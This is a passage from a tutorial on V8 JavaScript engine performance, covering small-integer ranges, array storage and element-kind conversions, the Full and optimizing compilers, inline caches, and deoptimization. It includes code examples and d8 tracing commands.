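// range [-2^30, 2^30 - 1]. The 31-bit range is taken from the text above;
// the exact small-integer range is build-dependent (assumption).
const SMI31_MIN = -(2 ** 30);
const SMI31_MAX = 2 ** 30 - 1;

function fitsIn31Bits(value) {
  return Number.isInteger(value) &&
    !Object.is(value, -0) && // negative zero needs a floating-point representation
    value >= SMI31_MIN &&
    value <= SMI31_MAX;
}

console.log(fitsIn31Bits(42));      // small integer
console.log(fitsIn31Bits(4.2));     // has a fractional part
console.log(fitsIn31Bits(2 ** 30)); // one past the upper bound
```

Counters, array indices and similar values stay comfortably inside this range; values with fractional parts or very large magnitudes fall outside it.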
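Arrays
In order to handle large and sparse arrays, there are two types of array storage internally:
·Fast Elements: linear storage for compact key sets
·Dictionary Elements: hash table storage otherwise
It's best not to cause the array storage to flip from one type to another.
Therefore:
·Use contiguous keys starting at 0 for Arrays
·Don't pre-allocate large Arrays (e.g. > 64K elements) to their maximum size; instead grow as you go
·Don't delete elements in arrays, especially numeric arrays
·Don't load uninitialized or deleted elements:
a = new Array();
for (var b = 0; b < 10; b++) {
  a[0] |= b; // Oh no!
}
//vs.
a = new Array();
a[0] = 0;
for (var b = 0; b < 10; b++) {
  a[0] |= b; // Much better! 2x faster.
}
Also, Arrays of doubles are faster: the array's hidden class tracks element types, and arrays containing only doubles are unboxed (which causes a hidden class change). However, careless manipulation of Arrays can cause extra work due to boxing and unboxing, e.g.:
var a = new Array();
a[0] = 77; // Allocates
a[1] = 88;
a[2] = 0.5; // Allocates, converts
a[3] = true; // Allocates, converts
is less efficient than:
var a = [77, 88, 0.5, true];
because in the first example the individual assignments are performed one after another, and the assignment of a[2] causes the Array to be converted to an Array of unboxed doubles, but then the assignment of a[3] causes it to be re-converted back to an Array that can contain any values (Numbers or objects). In the second case, the compiler knows the types of all of the elements in the literal, and the hidden class can be determined up front.
Therefore:
•Initialize using array literals for small fixed-sized arrays
•Preallocate small arrays (<64k) to the correct size before using them
•Don't store non-numeric values (objects) in numeric arrays
•Be careful not to cause re-conversion of small arrays if you do initialize without a literal.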
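The conversions described for the a[0] to a[3] example can be traced with a toy model. The three kind labels (SMI, DOUBLE, GENERIC) are simplified names chosen for illustration rather than V8's exact internal names, and traceKinds is a hypothetical helper.

```javascript
// Toy model of how an array's element representation only ever becomes
// more general as values are stored. Kind names are simplified labels.
const KINDS = ['SMI', 'DOUBLE', 'GENERIC'];

function kindOfValue(value) {
  if (typeof value !== 'number') return 'GENERIC';
  const isSmallInt = Number.isInteger(value) && !Object.is(value, -0) &&
    value >= -(2 ** 30) && value < 2 ** 30;
  return isSmallInt ? 'SMI' : 'DOUBLE';
}

// Returns the array's kind after each store, so conversions are visible.
function traceKinds(values) {
  let current = 0; // index into KINDS; starts at the most specific kind
  return values.map((value) => {
    current = Math.max(current, KINDS.indexOf(kindOfValue(value)));
    return KINDS[current];
  });
}

console.log(traceKinds([77, 88, 0.5, true]).join(' -> '));
```

Each change of label in the trace corresponds to one of the "converts" comments in the example above. With an array literal the final kind can be picked once, up front, instead of being reached through two conversions.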
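JavaScript compilation
Although JavaScript is a very dynamic language, and original implementations of it were interpreters, modern JavaScript runtime engines use compilation. V8 (Chrome's JavaScript engine) in fact has two different Just-In-Time (JIT) compilers:
•The "Full" compiler, which can generate good code for any JavaScript
•The optimizing compiler, which produces great code for most JavaScript, but takes longer to compile.
The Full compiler
In V8, the Full compiler runs on all code and starts executing code as soon as possible, quickly generating good but not great code. This compiler assumes almost nothing about types at compilation time; it expects that the types of variables can and will change at runtime. The code generated by the Full compiler uses inline caches (ICs) to refine knowledge about types while the program runs, improving efficiency on the fly.
The goal of inline caches is to handle types efficiently by caching type-dependent code for operations; when the code runs, it validates type assumptions first, then uses the inline cache to shortcut the operation. However, this means that operations that accept multiple types will be less performant.
Therefore:
•Monomorphic use of operations is preferred over polymorphic operations
Operations are monomorphic if the hidden classes of their inputs are always the same; otherwise they are polymorphic, meaning some of the arguments can change type across different calls to the operation. For example, the second add() call in this example causes polymorphism:
function add(x, y) {
  return x + y;
}
add(1, 2); // + in add is monomorphic
add("a", "b"); // + in add becomes polymorphic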
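The monomorphic and polymorphic states can be mimicked by recording which operand types an operation has seen. This is a toy sketch: real feedback is keyed on hidden classes rather than typeof results, the limit of 4 before a site is called "megamorphic" is an assumption for illustration, and makeFeedbackSite and tracedAdd are hypothetical names.

```javascript
// Toy call-site feedback: classify an operation by how many distinct
// operand-type combinations it has seen. The limit is an assumption.
const POLYMORPHIC_LIMIT = 4;

function makeFeedbackSite() {
  const seen = new Set();
  return {
    record(...operands) {
      const key = operands
        .map((value) => (value === null ? 'null' : typeof value))
        .join(',');
      seen.add(key);
    },
    state() {
      if (seen.size === 0) return 'uninitialized';
      if (seen.size === 1) return 'monomorphic';
      return seen.size <= POLYMORPHIC_LIMIT ? 'polymorphic' : 'megamorphic';
    },
  };
}

const plusSite = makeFeedbackSite();

// Same body as add() above, with feedback recording added.
function tracedAdd(x, y) {
  plusSite.record(x, y);
  return x + y;
}

const initialState = plusSite.state();
tracedAdd(1, 2);
const afterNumbers = plusSite.state();
tracedAdd('a', 'b');
const afterStrings = plusSite.state();
console.log(initialState, afterNumbers, afterStrings);
```

The second call does not make the addition wrong, it only means the site can no longer be handled by a single cached case.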
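The optimizing compiler
In parallel with the Full compiler, V8 re-compiles "hot" functions (that is, functions that are run many times) with an optimizing compiler. This compiler uses type feedback to make the compiled code faster; in fact, it uses the types taken from the ICs we just talked about!
In the optimizing compiler, operations get inlined (placed directly where they are called). This speeds execution (at the cost of memory footprint) and also enables other optimizations. Monomorphic functions and constructors can be inlined entirely (that's another reason why monomorphism is a good idea in V8).
You can log what gets optimized using the standalone "d8" version of the V8 engine:
d8 --trace-opt primes.js
(This logs the names of optimized functions to stdout.)
Not all functions can be optimized, however; some features prevent the optimizing compiler from running on a given function (a "bail-out"). In particular, the optimizing compiler currently bails out on functions with try {} catch {} blocks!
Therefore:
•Put perf-sensitive code into a nested function if you have try {} catch {} blocks:
function perf_sensitive() {
  // Do performance-sensitive work here
}
try {
  perf_sensitive()
} catch (e) {
  // Handle exceptions here
}
This guidance will probably change in the future, as we enable try/catch blocks in the optimizing compiler. You can examine how the optimizing compiler is bailing out on functions by using the "--trace-opt" option with d8 as above, which gives you more information on which functions were bailed out:
d8 --trace-opt primes.js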
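De-optimization
Finally, the optimization performed by this compiler is speculative: sometimes it doesn't work out, and we back off. The process of "deoptimization" throws away optimized code and resumes execution at the right place in the "full" compiler code. Reoptimization might be triggered again later, but in the short term, execution slows down. In particular, causing changes in the hidden classes of variables after the functions have been optimized will cause this deoptimization to occur.
Therefore:
•Avoid hidden class changes in functions after they are optimized
You can, as with other optimizations, get a log of functions that V8 had to deoptimize with a logging flag:
d8 --trace-deopt primes.js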
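The speculate-then-bail-out pattern can be imitated in plain JavaScript. This is a toy sketch only: real deoptimization swaps machine code and resumes mid-function, whereas here a guarded specialized function simply falls back to a generic one. makeSpeculative and its parameters are hypothetical names.

```javascript
// Toy speculation-and-bailout: a "specialized" version of a function is
// guarded by a type check and discarded the first time the check fails.
function makeSpeculative(generic, guard, specialized) {
  const state = { optimized: true, deopts: 0 };
  function call(...args) {
    if (state.optimized) {
      if (guard(...args)) return specialized(...args);
      state.optimized = false; // assumption violated: drop the fast version
      state.deopts++;
    }
    return generic(...args);
  }
  return { call, state };
}

const doubleProp = makeSpeculative(
  (obj) => obj.prop + obj.prop,          // generic: works for any prop
  (obj) => typeof obj.prop === 'string', // guard: the speculated type
  (obj) => obj.prop.concat(obj.prop)     // specialized for strings
);

const outputs = [];
for (let i = 1; i <= 5; i++) {
  // The fourth call passes an object whose prop is not a string.
  outputs.push(doubleProp.call(i !== 4 ? { prop: 'a' } : { prop: [] }));
}
console.log(outputs, doubleProp.state);
```

After the fourth call the specialized version is never used again in this model, which mirrors the short-term slowdown described above.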
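Other V8 tools
By the way, you can also pass V8 tracing options to Chrome on startup:
"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --js-flags="--trace-opt --trace-deopt"
In addition to profiling with the developer tools, you can also use d8 to do profiling:
% out/ia32.release/d8 primes.js --prof
This uses the built-in sampling profiler, which takes a sample every millisecond and writes v8.log.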
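In summary...
It's important to identify and understand how the V8 engine works with your code in order to prepare to build performant JavaScript. Once again, the basic advice is:
•Be prepared before you have (or notice) a problem
•Then, identify and understand the crux of your problem
•Finally, fix what matters
This means you should first make sure the problem is in your JavaScript, using other tools like PageSpeed; possibly reduce to pure JavaScript (no DOM) before collecting metrics, and then use those metrics to locate bottlenecks and eliminate the important ones. Hopefully Daniel's talk (and this article) will help you better understand how V8 runs JavaScript, but be sure to focus on optimizing your own algorithms too!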